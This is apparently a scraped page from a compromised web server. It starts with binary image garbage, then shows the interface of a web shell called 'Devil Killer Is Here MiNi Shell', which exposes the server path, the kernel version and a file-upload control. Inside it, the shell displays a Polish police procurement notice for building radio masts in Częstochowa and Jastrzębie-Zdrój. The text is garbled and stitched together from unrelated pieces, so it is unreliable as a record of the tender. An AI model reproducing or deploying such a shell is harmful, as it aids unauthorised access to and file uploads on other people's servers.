JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231106/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231106/0047807601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „KWP KATOWICE – BUDOWA MASZTÓW – MASZTY ZLOKALIZOWANE W CZĘSTOCHOWIE PRZY UL. WESTERPLATTE 23 I 27, NA DACHU BUDYNKU KOMENDY MIEJSKIEJ POLICJI W JASTRZĘBIU-ZDROJU” W FORMULE „ZAPROJEKTUJ I WYBUDUJ” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Wojewódzka Policji w Katowicach</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Wydział Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 270208292</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Lompy 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-038</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@ka.policja.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.slaska.policja.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „KWP KATOWICE – BUDOWA MASZTÓW – MASZTY ZLOKALIZOWANE W CZĘSTOCHOWIE PRZY UL. WESTERPLATTE 23 I 27, NA DACHU BUDYNKU KOMENDY MIEJSKIEJ POLICJI W JASTRZĘBIU-ZDROJU” W FORMULE „ZAPROJEKTUJ I WYBUDUJ” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7209a2dd-7c86-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00478076</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00129271/27/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.14 KWP Katowice - budowa masztów - maszty zlokalizowane w Częstochowie przy ul. Westerplatte 23 i 27 oraz na dachu budynku KMP w Jastrzębiu-Zdroju&#34; w formule &#39;zaprojektuj i wybuduj&#39; z podziałem na zad.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://slaska-policja.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://slaska-policja.eb2b.com.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 30.12.2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz.U. 2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na platformazakupowa.pl, tj.:a) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż<br/>512 kb/s;b) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z<br/>systemów operacyjnych – MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje;c) Zainstalowana dowolna przeglądarka<br/>internetowa, w przypadku Internet Explorer minimalnie wersja 10.0;d) Włączona obsługa JavaScript;e) Zainstalowany program<br/>Acrobat Reader lub inny obsługujący pliki w formacie .pdf.f) Dopuszczalny format przesyłanych danych tj. plików o wielkości do 50<br/>MB w formatach: .pdfg) Plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, jest w Systemie zaszyfrowany.<br/>Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert.h)<br/>Oznaczenie czasu odbioru danych przez Platformę stanowi przypiętą do dokumentu elektronicznego datę oraz dokładny czas<br/>(hh:mm:ss), znajdującą się po lewej stronie dokumentu w kolumnie „Data przesłania”. Poniżej została określona instrukcja<br/>korzystania z Platformy, tj.:a) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu. Po wprowadzeniu danych<br/>użytkownika tj. adresu e-mail oraz hasła zgłoszenie jest automatycznie akceptowane przez system.b) w zakładce „Postępowania”,<br/>„Lista postępowań otwartych” należy wybrać niniejsze postępowanie oraz korzystając z polecenia „zgłoś się do udziału w<br/>postępowaniu” przejść do Formularza rejestracyjnego – w przypadku, gdy Wykonawca nie posiada konta na Platformie lub panelu<br/>logowania użytkownika do Systemu.<br/>c) po wypełnieniu Formularza rejestracyjnego Wykonawca otrzyma e-maila informującego, że może dokonać pierwszego logowania<br/>do Platformy.<br/>Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z zasadami korzystania z https://slaskapolicja.<br/>eb2b.com.pl, w szczególności za sytuację, gdy Zamawiający zapozna się z treścią oferty przed upływem terminu składania<br/>ofert (np. złożenie oferty w zakładce Pytania/Informacje”). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i<br/>nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony w art. 221<br/>ustawy.Formaty plików wykorzystywanych przez Wykonawców powinny być zgodne z Obwieszczeniem Prezesa Rady Ministrów z<br/>09.11.2017r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności,<br/>minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla<br/>systemów teleinformatycznych.a) Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg).b) W celu<br/>ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip i .7Z Zaleca się, aby komunikacja<br/>z Wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza Pytania/Informacje”, nie za pośrednictwem adresu<br/>email.<br/>Informacji technicznych i weryfikacji danych oraz podpisów elektronicznych związanych z prowadzonym postępowaniem<br/>udziela Operator Platformy Zakupowej pod numerem telefonu (+48) 22 378 39 70, (+48) 22 258 48 61, (+48) 22 428 19 28, e-mail:<br/>helpdesk@eb2b.com.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">KLAUZULA INFORMACYJNA KOMENDY WOJEWÓDZKIEJ POLICJI W KATOWICACH<br/>dla uczestników postępowań o udzielenie zamówień publicznych, Wykonawców oraz innych osób których dane osobowe pozyskano<br/>w związku z ubieganiem się o udzielenie zamówienia bądź w związku z realizacją zamówienia przez Wykonawcę. Pouczenie<br/>wynikające z art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony<br/>osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119).<br/>Zamawiający informuje, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Komendant Wojewódzki Policji w Katowicach z siedzibą przy ul. J. Lompy 19,<br/>40-038 Katowice<br/>2. Inspektor Ochrony Danych wykonuje swoje obowiązki w siedzibie Komendy Wojewódzkiej Policji w Katowicach, zlokalizowanej w Katowicach przy ul. J. Lompy 19, tel. 32-200-24-03, e-mail iod.kwp@ka.policja.gov</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-2380-402/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 1 - KWP Katowice – budowa masztów – maszty zlokalizowane w Częstochowie przy ul. Westerplatte 23 i 27 - przedmiotem zamówienia jest zaprojektowanie i wykonanie robót związanych z demontażem dwóch masztów antenowych w dwóch lokalizacjach, instalacji antenowych oraz dostawa i montaż dwóch nowych masztów z towarzyszącą infrastrukturą radiokomunikacyjną oraz montaż urządzeń radiowych w celu poprawienia i zapewnienia prawidłowych zasięgów łączności radiotelefonicznej na terenie miasta Częstochowa. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zam. wybierze najkorz. ofertę spośród ofert niepodl. Odrz. na podst. kryt.:<br/>a. cena oferty brutto – 60 %<br/>b. okres gwar. na roboty budow. - 40 %<br/>Oceniane będą tylko oferty niepodl. odrzuc. - ważne wg wzoru i punktacji:<br/>Y=A+B<br/>gdzie:<br/>Y - Suma pkt bad. ważnej oferty<br/>A - cena oferty brutto - 60%, co odpowiada 60 pkt<br/>B -wydł. okresu gwar. na roboty bud. - 40 %, co odpowiada 40 pkt<br/>łącznie maks. 100 pkt<br/>O wyborze najkorz. oferty zadecyduje najwyższa ilość pkt uzysk. łącznie za wszystkie kryteria.<br/>Kryt. A - cena oferty brutto<br/>Ocena będzie dok. poprzez porówn. cen brutto w ofertach do ceny najniższej spośród ofert niepodl. odrzuc. P-ty za kryterium będą obliczone:<br/>A=(C min)/(C bad) x 60 pkt<br/>gdzie:<br/>A - ilość pkt uzyskanych przez Wyk.<br/>C min - najniższa cena oferty brutto<br/>C bad - cena brutto badanej oferty<br/>Wyzn. wartości pkt:<br/>a) ważna oferta z najniższą ceną otrzyma maks. liczbę pkt tj. 60<br/>b) inne ważne oferty cen. zostaną przel. wg pow. wzoru<br/>c) jeżeli ważne oferty cen.po przel. wg pow. wzoru będą sobie równe otrzymają taką samą liczbę pkt.<br/>Zasady przyznawania pkt<br/>a) Wartości liczone będą do dwóch miejsc po przecinku<br/>b) Otrzymana tak wartość podstawiona zostanie do wzoru na wyl. og. liczby pkt.<br/><br/>Kryterium B – wydł. okresu gwar. na roboty bud.<br/>Ocena będzie dok. poprzez porównanie o ile m-cy został wydłużony min. okres gwar. w bad. ofercie do najbardziej wydł. okresu gwar. na roboty bud. spośród ofert niepodl. odrzuceniu. Punkty za kryterium będą obliczone:<br/>B=(G bad)/(G max) x 40 pkt<br/>gdzie:<br/>B - ilość pkt uzyskanych przez Wyk.<br/>G bad – przedł. okresu gwar. oferty badanej (w m-cach)<br/>G max – najw.przedł. okresu gwar.(w m-cach) do maks. poziomu tj. 84 m-ce.<br/>Wyzn. wartości punktów:<br/>a)	ważna oferta z najdł. okresem gwar. na roboty bud. otrzyma maks. liczbę punktów tj. 40;<br/>b)	inne ważne oferty z podanym okresem gwarancji na roboty bud. zostaną przel. wg powyższego wzoru;<br/>c)	jeżeli ważne oferty z podanym okresem gwarancji na roboty bud. po przel. wg powyższego wzoru będą sobie równe otrzymają taką samą liczbę pkt;<br/>d)	Punktowane będą jedynie okresy gwarancji na roboty bud. przewyższające gwarancję min. wynoszącą 60 m-cy, jednakże nie dłuższą niż 84 m-ce.<br/>Zasady przyznawania punktów:<br/>a)	Wartości liczone będą do dwóch miejsc po przecinku.<br/>b)	Otrzymana tak wartość podstawiona zostanie do wzoru na wyl. ogólnej liczby pkt.<br/>c)	Zamawiający wymaga wskazania dł. gwarancji na wykonane roboty bud. w formie ośw. złożonego na formularzu ofertowym, przy czym wymagana min. dł. gwarancji wynosi 60 m-cy licząc od dnia odbioru końcowego. Maks. długość gwarancji, która zostanie podstawiona do wzoru na wyliczenie ogólnej wartości pkt wynosi 84 m-ce licząc od dnia odbioru końc.<br/>d)	Do celu wyboru najkorz. oferty będzie liczony okres gwarancji do 84 m-y.<br/>Jeżeli Wykonawca zaoferuje okres gwarancji dłuższy niż 84 m-ce, do wzoru zostanie podstawiony okres 84 m-cy, natomiast do umowy zostanie wpisany okres gwarancji zaoferowany przez Wykonawcę (np.: Wykonawca zaoferuje 86 m-cy gwarancji na roboty budowlane – do przel. będzie brany okres 84 m-cy, a do umowy wpisany okres 86 m-cy).<br/>e)	Zam. wymaga, aby gwarancja była podana w pełnych m-cach.<br/>f)	Zam. wymaga, aby okres rękojmi był równy okresowi zaofer. gwarancji na roboty bud.<br/>g)	Wyk. może zwiększać okres gwarancji w skokach co 1 m-c.<br/>h)	Błędne podanie okresu gwarancji np. 66,5 m-ca lub w innych jednostkach tyg. np.: 267 tyg., dniach Zam. przeliczy na okres m-czny i zaokrągli w dół. Przyjmując że m-c stanowi 30 dni lub 4 tyg. (tym samym, gdy Wyk. wpisze 66,5 m-ca - do przel. będzie brany okres 6 m-cy powyżej gwarancji min.; 267 tyg. - do przel. będzie brany okres 3 m-cy powyżej gw. Min.).<br/>i)	Podanie przez Wyk. krótszego okresu gwar. niż 60 m-cy na roboty bud., będzie potraktowane przez Zam. jako niezgodność oferty z dokumentami zamówienia, a oferta zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>j)	W przypadku braku wskazania długości gwar. przez Wyk, Zam. przyjmie, iż Wyk. udziela gwar. w wysokości min. wymag.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 2 - KWP Katowice – budowa masztów – maszt zlokalizowany na dachu budynku Komendy Miejskiej Policji w Jastrzębiu – Zdroju - przedmiotem zamówienia jest zaprojektowanie i wykonanie robót związanych z posadowieniem nowego masztu z towarzyszącą infrastrukturą radiokomunikacyjną oraz montaż urządzeń radiowych w celu poprawienia i zapewnienia prawidłowych zasięgów łączności radiotelefonicznej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zam. wybierze najkorz. ofertę spośród ofert niepodl. Odrz. na podst. kryt.:<br/>a. cena oferty brutto – 60 %<br/>b. okres gwar. na roboty budow. - 40 %<br/>Oceniane będą tylko oferty niepodl. odrzuc. - ważne wg wzoru i punktacji:<br/>Y=A+B<br/>gdzie:<br/>Y - Suma pkt bad. ważnej oferty<br/>A - cena oferty brutto - 60%, co odpowiada 60 pkt<br/>B -wydł. okresu gwar. na roboty bud. - 40 %, co odpowiada 40 pkt<br/>łącznie maks. 100 pkt<br/>O wyborze najkorz. oferty zadecyduje najwyższa ilość pkt uzysk. łącznie za wszystkie kryteria.<br/>Kryt. A - cena oferty brutto<br/>Ocena będzie dok. poprzez porówn. cen brutto w ofertach do ceny najniższej spośród ofert niepodl. odrzuc. P-ty za kryterium będą obliczone:<br/>A=(C min)/(C bad) x 60 pkt<br/>gdzie:<br/>A - ilość pkt uzyskanych przez Wyk.<br/>C min - najniższa cena oferty brutto<br/>C bad - cena brutto badanej oferty<br/>Wyzn. wartości pkt:<br/>a) ważna oferta z najniższą ceną otrzyma maks. liczbę pkt tj. 60<br/>b) inne ważne oferty cen. zostaną przel. wg pow. wzoru<br/>c) jeżeli ważne oferty cen.po przel. wg pow. wzoru będą sobie równe otrzymają taką samą liczbę pkt.<br/>Zasady przyznawania pkt<br/>a) Wartości liczone będą do dwóch miejsc po przecinku<br/>b) Otrzymana tak wartość podstawiona zostanie do wzoru na wyl. og. liczby pkt.<br/><br/>Kryterium B – wydł. okresu gwar. na roboty bud.<br/>Ocena będzie dok. poprzez porównanie o ile m-cy został wydłużony min. okres gwar. w bad. ofercie do najbardziej wydł. okresu gwar. na roboty bud. spośród ofert niepodl. odrzuceniu. Punkty za kryterium będą obliczone:<br/>B=(G bad)/(G max) x 40 pkt<br/>gdzie:<br/>B - ilość pkt uzyskanych przez Wyk.<br/>G bad – przedł. okresu gwar. oferty badanej (w m-cach)<br/>G max – najw.przedł. okresu gwar.(w m-cach) do maks. poziomu tj. 84 m-ce.<br/>Wyzn. wartości punktów:<br/>a)	ważna oferta z najdł. okresem gwar. na roboty bud. otrzyma maks. liczbę punktów tj. 40;<br/>b)	inne ważne oferty z podanym okresem gwarancji na roboty bud. zostaną przel. wg powyższego wzoru;<br/>c)	jeżeli ważne oferty z podanym okresem gwarancji na roboty bud. po przel. wg powyższego wzoru będą sobie równe otrzymają taką samą liczbę pkt;<br/>d)	Punktowane będą jedynie okresy gwarancji na roboty bud. przewyższające gwarancję min. wynoszącą 60 m-cy, jednakże nie dłuższą niż 84 m-ce.<br/>Zasady przyznawania punktów:<br/>a)	Wartości liczone będą do dwóch miejsc po przecinku.<br/>b)	Otrzymana tak wartość podstawiona zostanie do wzoru na wyl. ogólnej liczby pkt.<br/>c)	Zamawiający wymaga wskazania dł. gwarancji na wykonane roboty bud. w formie ośw. złożonego na formularzu ofertowym, przy czym wymagana min. dł. gwarancji wynosi 60 m-cy licząc od dnia odbioru końcowego. Maks. długość gwarancji, która zostanie podstawiona do wzoru na wyliczenie ogólnej wartości pkt wynosi 84 m-ce licząc od 